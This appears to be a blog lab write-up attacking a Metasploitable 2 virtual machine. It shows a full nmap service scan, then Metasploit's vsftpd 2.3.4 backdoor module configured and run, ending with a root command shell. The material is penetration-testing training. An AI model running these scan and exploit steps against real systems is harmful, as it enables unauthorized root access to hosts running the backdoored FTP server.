ftp-anon: Anonymous FTP login allowed (FTP code 230) Metasploitable 2

September 02, 2017

Nmap Command:
root@kali:~# nmap -v -A 192.168.32.134

Result:
Scanning 192.168.32.134 [1000 ports]
Discovered open port 111/tcp on 192.168.32.134
Discovered open port 80/tcp on 192.168.32.134
Discovered open port 23/tcp on 192.168.32.134
Discovered open port 5900/tcp on 192.168.32.134
Discovered open port 25/tcp on 192.168.32.134
Discovered open port 21/tcp on 192.168.32.134
Discovered open port 139/tcp on 192.168.32.134
Discovered open port 22/tcp on 192.168.32.134
Discovered open port 53/tcp on 192.168.32.134
Discovered open port 445/tcp on 192.168.32.134
Discovered open port 3306/tcp on 192.168.32.134
Discovered open port 6000/tcp on 192.168.32.134
Discovered open port 2049/tcp on 192.168.32.134
Discovered open port 8180/tcp on 192.168.32.134
Discovered open port 514/tcp on 192.168.32.134
Discovered open port 5432/tcp on 192.168.32.134
Discovered open port 1524/tcp on 192.168.32.134
Discovered open port 1099/tcp on 192.168.32.134
Discovered open port 6667/tcp on 192.168.32.134
Discovered open port 2121/tcp on 192.168.32.134
Discovered open port 513/tcp on 192.168.32.134
Discovered open port 512/tcp on 192.168.32.134
Completed SYN Stealth Scan at 15:14, 0.13s elapsed (1000 total ports)
Initiating Service scan at 15:14
Scanning 22 services on 192.168.32.134
Completed Service scan at 15:17, 149.25s elapsed (22 services on 1 host)
Initiating OS detection (try #1) against 192.168.32.134
NSE: Script scanning 192.168.32.134.
Initiating NSE at 15:17
Completed NSE at 15:18, 78.81s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 1.04s elapsed
Nmap scan report for 192.168.32.134
Host is up (0.00032s latency).
Not shown: 978 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2017-08-29T03:37:05+00:00; -4d15h40m42s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      49963/udp  mountd
|   100005  1,2,3      56762/tcp  mountd
|   100021  1,3,4      42223/tcp  nlockmgr
|   100021  1,3,4      60764/udp  nlockmgr
|   100024  1          40722/tcp  status
|_  100024  1          43226/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 10
|   Capabilities flags: 43564
|   Some Capabilities: SwitchToSSLAfterHandshake, SupportsTransactions, ConnectWithDatabase, Support41Auth, LongColumnFlag, SupportsCompression, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: !/g:.v+opby\?gfM/CA[
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: TLS randomness does not represent time
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8180/tcp open  unknown
MAC Address: 00:0C:29:B0:10:B0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.030 days (since Sat Sep  2 14:35:03 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -4d15h40m42s, deviation: 0s, median: -4d15h40m42s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-08-28T23:37:04-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.32.134

NSE: Script Post-scanning.


Go to the MSF Console:
Command:
msf > search vsftpd


Result:
Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


Command:
msf > use exploit/unix/ftp/vsftpd_234_backdoor

Result:
msf exploit(vsftpd_234_backdoor) > 

Command:
msf exploit(vsftpd_234_backdoor) > show options 
msf exploit(vsftpd_234_backdoor) > set rhost 192.168.32.134 
msf exploit(vsftpd_234_backdoor) > show options 


Result:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.32.134   yes       The target address
   RPORT  21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit 

[*] 192.168.32.134:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.32.134:21 - USER: 331 Please specify the password.
[+] 192.168.32.134:21 - Backdoor service has been spawned, handling...
[+] 192.168.32.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.32.128:45125 -> 192.168.32.134:6200) at 2017-09-02 16:19:55 -0400

whoami
root
hostname
metasploitable



You Might Also Like

0 comments

Popular Posts

Like us on Facebook

Flickr Images